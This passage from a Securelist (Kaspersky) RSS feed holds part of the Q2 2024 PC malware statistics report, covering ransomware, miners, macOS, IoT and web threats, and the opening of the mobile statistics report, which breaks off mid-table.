ic3.gov.</p><p>According to the UK’s National Crime Agency (NCA) and the US Department of Justice, the Lockbit group amassed up to $1 billion in its attacks from June 2022 to February 2024.</p><h4 id="attacks-exploiting-vulnerabilities">Attacks exploiting vulnerabilities</h4><p>The<a href="https://www.cve.org/CVERecord?id=CVE-2024-26169" target="_blank" rel="noopener"> CVE-2024-26169</a> privilege escalation vulnerability, patched by Microsoft in March 2024, was likely exploited in attacks by the Black Basta group. Some evidence suggests that at the time of the exploitation, this vulnerability was still unpatched, making it a <a href="https://www.bleepingcomputer.com/news/security/black-basta-ransomware-gang-linked-to-windows-zero-day-attacks/" target="_blank" rel="noopener">zero-day vulnerability</a>.</p><p>In June 2024, a massive TellYouThePass ransomware attack was <a href="https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-exploits-recent-php-rce-flaw-to-breach-servers/" target="_blank" rel="noopener">launched</a>, exploiting the <a href="https://www.cve.org/CVERecord?id=CVE-2024-4577" target="_blank" rel="noopener">CVE-2024-4577</a> vulnerability in PHP. This attack targeted Windows servers with certain PHP configurations, including those with the default XAMPP stack. The attackers scanned public IP address ranges and automatically infected vulnerable servers, demanding 0.1 BTC as ransom. Although this is a relatively small amount, the scale of the attacks could have yielded substantial profits. In recent years, this method has not been used as frequently due to its cost for attackers, who prefer instead targeted attacks with the hands-on involvement of operators. However, in this case, the attackers employed the time-tested approach.</p><h3 id="most-active-groups">Most active groups</h3><p>Here are the most active ransomware groups based on the number of victims added to their DLSs (data leak sites). In Q2 2024, the Play group was the most active, publishing data on 12% of all new ransomware victims. Cactus came in second (7.74%), followed by Ransom Hub (7.50%).</p><div class="js-infogram-embed" data-id="_/egUGQFKAlDFA1mMluAm8" data-type="interactive" data-title="01 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The percentage of victims of a particular group (according to its DLS) among victims of all groups published on all DLSs examined during the reporting period (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174308/it-threat-evolution-q2-2024-pc-statistics_en_01.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="number-of-new-modifications">Number of new modifications</h3><p>In Q2 2024, we discovered five new ransomware families and 4,456 new ransomware variants.</p><div class="js-infogram-embed" data-id="_/cSFUDQ7khuTMPTE6XDfp" data-type="interactive" data-title="02 EN-RU-ES q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of new ransomware modifications, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174401/it-threat-evolution-q2-2024-pc-statistics_en_ru_es_02.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="number-of-users-attacked-by-ransomware-trojans">Number of users attacked by ransomware Trojans</h3><p>In Q2 2024, Kaspersky solutions protected 85,819 unique users from ransomware Trojans.</p><div class="js-infogram-embed" data-id="_/zbYzCpVpiWHHbihLNtHE" data-type="interactive" data-title="03 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by ransomware Trojans, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174435/it-threat-evolution-q2-2024-pc-statistics_en_03.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="geography-of-attacked-users">Geography of attacked users</h3><h4 id="top-10-countries-and-territories-targeted-by-ransomware-trojans">Top 10 countries and territories targeted by ransomware Trojans</h4><table width="100%"><tbody><tr><td width="10%"></td><td width="50%"><strong>Country/territory*</strong></td><td width="40%"><strong>% of users attacked by ransomware**</strong></td></tr><tr><td>1</td><td>Pakistan</td><td>0.84%</td></tr><tr><td>2</td><td>South Korea</td><td>0.72%</td></tr><tr><td>3</td><td>Bangladesh</td><td>0.54%</td></tr><tr><td>4</td><td>China</td><td>0.53%</td></tr><tr><td>5</td><td>Iran</td><td>0.52%</td></tr><tr><td>6</td><td>Libya</td><td>0.51%</td></tr><tr><td>7</td><td>Tajikistan</td><td>0.50%</td></tr><tr><td>8</td><td>Mozambique</td><td>0.49%</td></tr><tr><td>9</td><td>Angola</td><td>0.41%</td></tr><tr><td>10</td><td>Rwanda</td><td>0.40%</td></tr></tbody></table><p>*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.<br />**Percentage of unique users whose computers were attacked by ransomware Trojans out of all unique Kaspersky product users in that country or territory.</p><h4 id="top-10-most-common-families-of-ransomware-trojans">Top 10 most common families of ransomware Trojans</h4><table width="100%"><tbody><tr><td width="10%"></td><td width="25%"><strong>Name</strong></td><td width="40%"><strong>Verdicts*</strong></td><td width="25%"><strong>Share of attacked users**</strong></td></tr><tr><td>1</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Gen</td><td>22.12%</td></tr><tr><td>2</td><td>WannaCry</td><td>Trojan-Ransom.Win32.Wanna</td><td>9.51%</td></tr><tr><td>3</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Encoder</td><td>6.94%</td></tr><tr><td>4</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Crypren</td><td>5.42%</td></tr><tr><td>5</td><td>Lockbit</td><td>Trojan-Ransom.Win32.Lockbit</td><td>4.71%</td></tr><tr><td>6</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Agent</td><td>2.88%</td></tr><tr><td>7</td><td>PolyRansom/VirLock</td><td>Virus.Win32.PolyRansom / Trojan-Ransom.Win32.PolyRansom</td><td>2.80%</td></tr><tr><td>8</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Phny</td><td>2.61%</td></tr><tr><td>9</td><td>(generic verdict)</td><td>Trojan-Ransom.Win32.Crypmod</td><td>2.58%</td></tr><tr><td>10</td><td>Stop/Djvu</td><td>Trojan-Ransom.Win32.Stop</td><td>2.11%</td></tr></tbody></table><p>*Statistics are based on detection verdicts by Kaspersky products. The information was provided by Kaspersky users who consented to providing statistical data.<br />**Unique Kaspersky users attacked by the ransomware Trojan family as a percentage of total users attacked by ransomware Trojans.</p><h2 id="miners">Miners</h2><h3 id="number-of-new-modifications">Number of new modifications</h3><p>In Q2 2024, Kaspersky products detected 36,380 new miner variants.</p><div class="js-infogram-embed" data-id="_/40jPNzjmHQ6wNERxvsoN" data-type="interactive" data-title="04 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of new miner modifications, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174538/it-threat-evolution-q2-2024-pc-statistics_en_04.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="number-of-users-attacked-by-miners">Number of users attacked by miners</h3><p>In Q2 2024, we detected attacks using miners on 339,850 unique Kaspersky users worldwide.</p><div class="js-infogram-embed" data-id="_/Al3zWO61bthWPjtHRfU3" data-type="interactive" data-title="05 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of unique users attacked by miners, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174617/it-threat-evolution-q2-2024-pc-statistics_en_05.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="geography-of-attacked-users">Geography of attacked users</h3><h4 id="top-10-countries-and-territories-targeted-by-miners">Top 10 countries and territories targeted by miners</h4><table width="100%"><tbody><tr><td width="10%"></td><td width="50%"><strong>Country/territory*</strong></td><td width="40%"><strong>% of users attacked by miners**</strong></td></tr><tr><td>1</td><td>Tajikistan</td><td>2.40%</td></tr><tr><td>2</td><td>Venezuela</td><td>1.90%</td></tr><tr><td>3</td><td>Kazakhstan</td><td>1.63%</td></tr><tr><td>4</td><td>Ethiopia</td><td>1.58%</td></tr><tr><td>5</td><td>Kyrgyzstan</td><td>1.49%</td></tr><tr><td>6</td><td>Belarus</td><td>1.48%</td></tr><tr><td>7</td><td>Uzbekistan</td><td>1.36%</td></tr><tr><td>8</td><td>Ukraine</td><td>1.05%</td></tr><tr><td>9</td><td>Panama</td><td>1.03%</td></tr><tr><td>10</td><td>Mozambique</td><td>1.01%</td></tr></tbody></table><p>*Countries and territories with fewer than 50,000 Kaspersky users were excluded from the calculations.<br />**Percentage of unique users whose computers were attacked by miners out of all unique Kaspersky product users in that country or territory.</p><h2 id="attacks-on-macos">Attacks on macOS</h2><p>In Q2 2024, numerous samples of the spyware Trojan-PSW.OSX.Amos (also known as Cuckoo) were found. This spyware is notable for requesting an administrator password through osascript, displaying a phishing window. Attackers regularly update and repackage this Trojan to avoid detection.</p><p>New versions of the <a href="https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos" target="_blank" rel="noopener">LightRiver/LightSpy</a> spyware were also discovered. This Trojan downloads modules from the server with spy and backdoor functionalities. For example, they record the screen or audio, steal browser history, and execute arbitrary console commands.</p><h3 id="top-20-threats-to-macos">Top 20 threats to macOS</h3><div class="js-infogram-embed" data-id="_/iPjKVPodnbrCzpAZ3ufa" data-type="interactive" data-title="06 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The percentage of users who encountered a certain malware out of all attacked users of Kaspersky solutions for macOS (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174651/it-threat-evolution-q2-2024-pc-statistics_en_06.png" target="_blank" rel="noopener">download</a>)</em></p><p>The leading active threat continues to be a Trojan capable of downloading adware or other malicious applications. Other common threats include adware and fake “system optimizers” that demand money to “fix” nonexistent issues.</p><h3 id="geography-of-threats-for-macos">Geography of threats for macOS</h3><h4 id="top-10-countries-and-territories-by-share-of-attacked-users">Top 10 countries and territories by share of attacked users</h4><table width="100%"><tbody><tr><td width="40%"></td><td width="30%"><strong>Q1 2024*</strong></td><td width="30%"><strong>Q2 2024*</strong></td></tr><tr><td>Spain</td><td>1.27%</td><td>1.14%</td></tr><tr><td>Mexico</td><td>0.88%</td><td>1.09%</td></tr><tr><td>Hong Kong</td><td>0.73%</td><td>0.97%</td></tr><tr><td>France</td><td>0.93%</td><td>0.93%</td></tr><tr><td>United States</td><td>0.81%</td><td>0.89%</td></tr><tr><td>Italy</td><td>1.11%</td><td>0.87%</td></tr><tr><td>United Kingdom</td><td>0.75%</td><td>0.85%</td></tr><tr><td>India</td><td>0.56%</td><td>0.70%</td></tr><tr><td>Germany</td><td>0.77%</td><td>0.59%</td></tr><tr><td>Brazil</td><td>0.66%</td><td>0.57%</td></tr></tbody></table><p>*Percentage of unique users encountering macOS threats out of all unique Kaspersky product users in that country or territory.</p><p>There has been a slight increase of 0.1–0.2 p.p. in the share of attacked users in Mexico, Hong Kong, the United Kingdom, and India. Conversely, we see a slight decline in Spain, Italy, and Germany.</p><h2 id="iot-threat-statistics">IoT threat statistics</h2><p>In the second quarter of 2024, the distribution of attack protocols on devices targeting Kaspersky honeypots was as follows:</p><div class="js-infogram-embed" data-id="_/kfBgkjO2sfQ8ieu7olds" data-type="interactive" data-title="07 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of attacked services by the number of unique IP addresses of the devices carrying out the attacks, Q1–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174845/it-threat-evolution-q2-2024-pc-statistics_en_07.png" target="_blank" rel="noopener">download</a>)</em></p><p>The share of attacks using the Telnet protocol continued to grow, reaching 98%.</p><div class="js-infogram-embed" data-id="_/c1BG0LGkv1jE0iqLAyT0" data-type="interactive" data-title="08 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of cybercriminal sessions with Kaspersky honeypots, Q1–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174922/it-threat-evolution-q2-2024-pc-statistics_en_08.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="top-10-threats-delivered-to-iot-devices">Top 10 threats delivered to IoT devices</h3><div class="js-infogram-embed" data-id="_/ZBDSnTGZ60ePjGkRiYyF" data-type="interactive" data-title="09 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share of a specific threat downloaded to an infected device as a result of a successful attack, out of the total number of downloaded threats (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02174956/it-threat-evolution-q2-2024-pc-statistics_en_09.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="attacks-on-iot-honeypots">Attacks on IoT honeypots</h3><p>For SSH protocol attacks, the share of attacks from China and India increased, while activity from South Korea slightly declined.</p><table width="100%"><tbody><tr><td width="40%"><strong>SSH</strong></td><td width="30%"><strong>Q1 2024</strong></td><td width="30%"><strong>Q2 2024</strong></td></tr><tr><td>China</td><td>20.58%</td><td>23.37%</td></tr><tr><td>United States</td><td>12.15%</td><td>12.26%</td></tr><tr><td>South Korea</td><td>9.59%</td><td>6.84%</td></tr><tr><td>Singapore</td><td>6.87%</td><td>6.95%</td></tr><tr><td>Germany</td><td>4.97%</td><td>4.13%</td></tr><tr><td>India</td><td>4.52%</td><td>5.24%</td></tr><tr><td>Hong Kong</td><td>3.25%</td><td>3.10%</td></tr><tr><td>Russian Federation</td><td>2.84%</td><td>2.33%</td></tr><tr><td>Brazil</td><td>2.36%</td><td>2.73%</td></tr><tr><td>Japan</td><td>2.36%</td><td>1.92%</td></tr></tbody></table><p>Telnet attacks from China returned to 2023 levels, while the share from India grew.</p><table width="100%"><tbody><tr><td width="40%"><strong>Telnet</strong></td><td width="30%"><strong>Q1 2024</strong></td><td width="30%"><strong>Q2 2024</strong></td></tr><tr><td>China</td><td>41.51%</td><td>30.24%</td></tr><tr><td>India</td><td>17.47%</td><td>22.68%</td></tr><tr><td>Japan</td><td>4.89%</td><td>3.64%</td></tr><tr><td>Brazil</td><td>3.78%</td><td>4.48%</td></tr><tr><td>Russian Federation</td><td>3.12%</td><td>3.85%</td></tr><tr><td>Thailand</td><td>2.95%</td><td>2.37%</td></tr><tr><td>Taiwan</td><td>2.73%</td><td>2.64%</td></tr><tr><td>South Korea</td><td>2.53%</td><td>2.46%</td></tr><tr><td>United States</td><td>2.20%</td><td>2.66%</td></tr><tr><td>Argentina</td><td>1.36%</td><td>1.76%</td></tr></tbody></table><h2 id="attacks-via-web-resources">Attacks via web resources</h2><p><em>The statistics in this section are based on the work of the web antivirus, which protects users at the moment malicious objects are downloaded from a malicious or infected webpage. Cybercriminals intentionally create malicious pages. Web resources with user-created content (such as forums), as well as compromised legitimate sites, can also be infected.</em></p><h3 id="countries-and-territories-that-serve-as-sources-of-web-based-attacks-top-10">Countries and territories that serve as sources of web-based attacks: Top 10</h3><p>The following statistics show the distribution of countries and territories that were the sources of internet attacks on users’ computers blocked by Kaspersky products (webpages with redirects to exploits, sites with exploits and other malware, botnet control centers, and so on). Any unique host could be the source of one or more web-based attacks.</p><p>To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.</p><p>In Q2 2024, Kaspersky solutions blocked 664,046,455 attacks launched from online resources across the globe. A total of 113,535,455 unique URLs that triggered the web antivirus were recorded.</p><div class="js-infogram-embed" data-id="_/SXJt6NhNH17lApfY7i2X" data-type="interactive" data-title="10 EN q2-malware-report-PC-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of web attack sources by country and territory (Q2 2024) (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02175327/it-threat-evolution-q2-2024-pc-statistics_en_10.png" target="_blank" rel="noopener">download</a>)</em></p><h3 id="countries-and-territories-where-users-faced-the-greatest-risk-of-online-infection">Countries and territories where users faced the greatest risk of online infection</h3><p>To assess the risk of malware infection through the internet faced by user’s computers in different countries and territories, we calculated the share of Kaspersky product users who encountered web antivirus detections during the reporting period for each country and territory. This data indicates the aggressiveness of the environment in which computers operate.</p><p>The following statistics are based on the detection verdicts of the web antivirus module, provided by Kaspersky product users who consented to share statistical data.</p><p>It’s important to note that only attacks involving malicious objects of the <strong>Malware</strong> class are included in this ranking. Web antivirus detections for potentially dangerous and unwanted programs, such as RiskTool and adware, were not counted.</p><table width="100%"><tbody><tr><td width="10%"></td><td width="50%"><strong>Country/territory*</strong></td><td width="40%"><strong>% of attacked users**</strong></td></tr><tr><td>1</td><td>Moldova</td><td>11.3635</td></tr><tr><td>2</td><td>Greece</td><td>10.8560</td></tr><tr><td>3</td><td>Qatar</td><td>10.4018</td></tr><tr><td>4</td><td>Belarus</td><td>9.8162</td></tr><tr><td>5</td><td>Argentina</td><td>9.5380</td></tr><tr><td>6</td><td>Bulgaria</td><td>9.4714</td></tr><tr><td>7</td><td>South Africa</td><td>9.4128</td></tr><tr><td>8</td><td>Sri Lanka</td><td>9.1585</td></tr><tr><td>9</td><td>Kyrgyzstan</td><td>8.8852</td></tr><tr><td>10</td><td>Lithuania</td><td>8.6847</td></tr><tr><td>11</td><td>Tunisia</td><td>8.6739</td></tr><tr><td>12</td><td>Albania</td><td>8.6586</td></tr><tr><td>13</td><td>North Macedonia</td><td>8.6463</td></tr><tr><td>14</td><td>Bosnia & Herzegovina</td><td>8.6291</td></tr><tr><td>15</td><td>Botswana</td><td>8.6254</td></tr><tr><td>16</td><td>UAE</td><td>8.5993</td></tr><tr><td>17</td><td>Germany</td><td>8.5887</td></tr><tr><td>18</td><td>Slovenia</td><td>8.5851</td></tr><tr><td>19</td><td>Egypt</td><td>8.5582</td></tr><tr><td>20</td><td>Canada</td><td>8.4985</td></tr></tbody></table><p>*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.<br />**Percentage of unique users subjected to web attacks by malicious objects of the <strong>Malware</strong> class out of all unique Kaspersky product users in that country or territory.</p><p>On average during the quarter, 7.38% of the internet users’ computers worldwide were subjected to at least one <strong>Malware</strong>-category web attack.</p><h2 id="local-threats">Local threats</h2><p>Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).</p><p>Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The following statistics are based on detection verdicts from the OAS (on-access scan, scanning when accessing a file) and ODS (on-demand scan, scanning launched by a user) antivirus modules, provided by Kaspersky product users who agreed to share statistical data. These statistics take into account malware found directly on users’ computers or on removable media connected to computers, such as flash drives, camera memory cards, phones, and external hard drives.</p><p>In the second quarter of 2024, our file antivirus detected 27,394,168 malicious and potentially unwanted objects.</p><h3 id="countries-and-territories-where-users-faced-the-highest-risk-of-local-infection">Countries and territories where users faced the highest risk of local infection</h3><p>For each country and territory, we calculated the percentage of Kaspersky users on whose computers file antivirus was triggered during the reporting period. This data reflects the level of infection of personal computers across different countries and territories worldwide.</p><p>Note that only attacks involving malicious objects of the <strong>Malware</strong> class are included in this ranking. Detections of potentially dangerous or unwanted programs such as RiskTool and adware were not counted.</p><table width="100%"><tbody><tr><td width="10%"></td><td width="50%"><strong>Country/territory*</strong></td><td width="40%"><strong>% of attacked users**</strong></td></tr><tr><td>1</td><td>Turkmenistan</td><td>44.2517</td></tr><tr><td>2</td><td>Afghanistan</td><td>39.4972</td></tr><tr><td>3</td><td>Cuba</td><td>38.3242</td></tr><tr><td>4</td><td>Yemen</td><td>38.2295</td></tr><tr><td>5</td><td>Tajikistan</td><td>37.5013</td></tr><tr><td>6</td><td>Uzbekistan</td><td>32.7085</td></tr><tr><td>7</td><td>Syria</td><td>31.5546</td></tr><tr><td>8</td><td>Burundi</td><td>30.5511</td></tr><tr><td>9</td><td>Bangladesh</td><td>28.3616</td></tr><tr><td>10</td><td>South Sudan</td><td>28.3293</td></tr><tr><td>11</td><td>Tanzania</td><td>28.0949</td></tr><tr><td>12</td><td>Cameroon</td><td>28.0254</td></tr><tr><td>13</td><td>Niger</td><td>27.9138</td></tr><tr><td>14</td><td>Algeria</td><td>27.8984</td></tr><tr><td>15</td><td>Benin</td><td>27.6164</td></tr><tr><td>16</td><td>Myanmar</td><td>26.6960</td></tr><tr><td>17</td><td>Venezuela</td><td>26.6944</td></tr><tr><td>18</td><td>Iran</td><td>26.5071</td></tr><tr><td>19</td><td>Vietnam</td><td>26.3409</td></tr><tr><td>20</td><td>Congo</td><td>26.3160</td></tr></tbody></table><p>*Countries and territories with fewer than 10,000 Kaspersky users were excluded from the calculations.<br />**Percentage of unique users on whose computers local <strong>Malware</strong>-class threats were blocked, out of all unique Kaspersky product users in that country or territory.</p><p>On average, 14.2% of users’ computers worldwide encountered at least one local <strong>Malware</strong>-class threat during the second quarter.</p><p>The figure for Russia was 15.68%.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024-pc-statistics/113683/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>IT threat evolution in Q2 2024. Mobile statistics</title> <link>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/</link> <comments>https://securelist.com/it-threat-evolution-q2-2024-mobile-statistics/113678/#respond</comments> <dc:creator><![CDATA[Anton Kivva]]></dc:creator> <pubDate>Tue, 03 Sep 2024 08:00:46 +0000</pubDate> <category><![CDATA[Malware reports]]></category> <category><![CDATA[Adware]]></category> <category><![CDATA[Google Android]]></category> <category><![CDATA[Google Play]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Statistics]]></category> <category><![CDATA[Mobile Malware]]></category> <category><![CDATA[Ransomware]]></category> <category><![CDATA[Trojan Banker]]></category><category><![CDATA[Mobile threats]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113678</guid> <description><![CDATA[The report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="quarterly-figures">Quarterly figures</h2><p>According to Kaspersky Security Network, in Q2 2024:</p><ul><li>7 million attacks using malware, adware or unwanted mobile software were blocked.</li><li>The most common threat to mobile devices was RiskTool software – 41% of all detected threats.</li><li>A total of 367,418 malicious installation packages were detected, of which:<ul><li>13,013 packages were for mobile banking Trojans;</li><li>1,392 packages were for mobile ransomware Trojans.</li></ul></li></ul><h2 id="quarterly-highlights">Quarterly highlights</h2><p>The number of malware, adware or unwanted software attacks on mobile devices climbed relative to the same period last year, but dropped against Q1 2024, with 7,697,975 attacks detected.</p><div class="js-infogram-embed" data-id="_/Kq5izMS108R1oUH8YYru" data-type="interactive" data-title="01 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of attacks on users of Kaspersky mobile solutions, Q4 2022 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153137/it_threat_evolution_q2_2024_mobile_statistics_en_01.png" target="_blank" rel="noopener">download</a>)</em></p><p>The decrease is due to a sharp drop in the activity of adware apps, mostly from the covert applications of the AdWare.AndroidOS.HiddenAd family, which opens ads on the targeted device.</p><p>In April of this year, <a href="https://securelist.com/mandrake-apps-return-to-google-play/113147/" target="_blank" rel="noopener">new versions of Mandrake spyware</a> were discovered. Distributed via Google Play, these apps used sophisticated techniques to hide their malicious functionality: concealing dangerous code in an obfuscated native library; using certificate pinning to detect attempts to track app network traffic; and multiple methods to check for emulated runtime environments, such as sandboxes.</p><div id="attachment_113681" style="width: 603px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113681" class="size-full wp-image-113681" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png" alt="A Mandrake app on Google Play" width="593" height="889" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01.png 593w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-200x300.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-233x350.png 233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/01231257/it_threat_evolution_q2_2024_mobile_statistics_01-187x280.png 187w" sizes="(max-width: 593px) 100vw, 593px" /></a><p id="caption-attachment-113681" class="wp-caption-text">A Mandrake app on Google Play</p></div><p>Also in Q2, the IOBot banking Trojan was found targeting users in Korea. To install an additional malware component with VNC backdoor functionality, the Trojan’s authors use a technique to bypass Android protection against granting extended permissions to apps downloaded from unofficial sources.</p><h2 id="mobile-threat-statistics">Mobile threat statistics</h2><p>The number of Android malware samples fell against the previous quarter to the Q2 2023 level, totaling 367,418 installation packages.</p><div class="js-infogram-embed" data-id="_/dSYNvRvP2rHtPABuXKgo" data-type="interactive" data-title="02 EN-RU-ES q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of detected malicious installation packages, Q2 2023 – Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153345/it_threat_evolution_q2_2024_mobile_statistics_en_02.png" target="_blank" rel="noopener">download</a>)</em></p><p>New trends emerged in the distribution of detected Adware and RiskTool packages: the former significantly decreased in number, while the latter increased. Otherwise, the number of detections remains largely the same.</p><div class="js-infogram-embed" data-id="_/tWBf1Zj5IVTaj4CnuQcZ" data-type="interactive" data-title="03 EN q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of detected mobile apps by type, Q1*–Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/02153816/it_threat_evolution_q2_2024_mobile_statistics_en_03.png" target="_blank" rel="noopener">download</a>)</em></p><p><em>*Data for the previous quarter may differ slightly from previously published data due to some verdicts being retrospectively revised.</em></p><p>Among adware, the number of HiddenAd, BrowserAd and Adlo apps dropped sharply, while the number of RiskTool.AndroidOS.Fakapp apps distributed under the guise of pornographic material rose. These apps collect and forward device information to a server, then open arbitrary URLs sent back in response.</p><div class="js-infogram-embed" data-id="_/zsco24gXSPLMkWxjgZ0T" data-type="interactive" data-title="04 EN q2-malware-report-MOBILE-STAT-data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Users attacked by the malware or unwanted software as a percentage* of all targeted users of Kaspersky mobile products, Q1*–Q2 2024 (<a href="https://securelist.com/it-threat-evolution-q1-2024-mobile-statistics/112750/" target="_blank" rel="noopener">download</a>)</em></p><p><em>*The sum may be greater than 100% if the same users encountered more than one type of attack.</em></p><p>Despite the prevalence of RiskTool.AndroidOS.Fakapp installation packages, the number of real users who encountered this family showed no noticeable growth. In other words, attackers released many unique samples, but their distribution was limited.</p><p>The main changes in the distribution of the share of attacked users were driven by a fall in the activity of HiddenAd adware and a rise in the activity of two RiskTool apps: Revpn and SpyLoan.</p><h2 id="top-20-most-frequently-detected-mobile-malware-programs">TOP 20 most frequently detected mobile malware programs</h2><p><em>Note that the malware rankings below exclude riskware and potentially unwanted software, such as RiskTool or adware.</em></p><table width="100%"><tbody><tr><td style="text-align: left" width="40%"><strong>Verdict</strong></td><td width="15%"><strong>Prev %</strong></td><td width="15%"><strong>New %</strong></td><td width="15%"><strong>Difference in p.p.</strong></td><td width="15%"><strong>Change in 